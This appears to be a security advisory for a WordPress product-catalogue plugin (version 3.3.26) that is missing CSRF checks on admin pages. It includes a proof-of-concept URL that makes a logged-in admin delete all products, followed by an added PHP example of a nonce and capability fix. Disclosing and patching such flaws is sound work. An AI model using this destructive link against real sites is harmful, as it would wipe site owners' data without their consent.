Description

The plugin does not have CSRF checks in some of its admin pages, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as deleting all products.
Make a logged-in admin open the URL below:

https://example.com/wp-admin/edit.php?post_type=al_product&page=system.php&delete_all_products&delete_all_products_confirm=1
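
The missing check described above can be closed with a WordPress nonce on the confirmation link and a matching verification in the handler. This is an added example, not the plugin's own code: the `example_` names, the nonce action string, the `manage_options` capability and the `admin_init` hook are assumptions.

```php
<?php
// Added example, not the plugin's code. Everything prefixed "example_" and
// the nonce action string are hypothetical names chosen for illustration.

const EXAMPLE_DELETE_ACTION = 'example_delete_all_products';

// Build the confirmation link with a per-user, per-action nonce attached.
// The query parameters mirror the ones in the URL shown on this page.
function example_delete_all_products_url() {
    $url = add_query_arg(
        array(
            'post_type'                   => 'al_product',
            'page'                        => 'system.php',
            'delete_all_products'         => 1,
            'delete_all_products_confirm' => 1,
        ),
        admin_url( 'edit.php' )
    );
    // Appends _wpnonce=<token> bound to the current user and this action.
    return wp_nonce_url( $url, EXAMPLE_DELETE_ACTION );
}

// Handle the request: capability check, then nonce check, then the action.
function example_handle_delete_all_products() {
    if ( ! isset( $_GET['delete_all_products_confirm'] ) ) {
        return; // not a delete request
    }
    // Assumed capability; use whatever the plugin requires for this page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to do this.', '', array( 'response' => 403 ) );
    }
    // Stops the request when _wpnonce is missing or invalid, which is the
    // case for a link crafted by a third party and opened by the admin.
    check_admin_referer( EXAMPLE_DELETE_ACTION );

    // Only past this point should the plugin's existing delete routine run.
}
add_action( 'admin_init', 'example_handle_delete_all_products' );
```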
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 3.3.26 |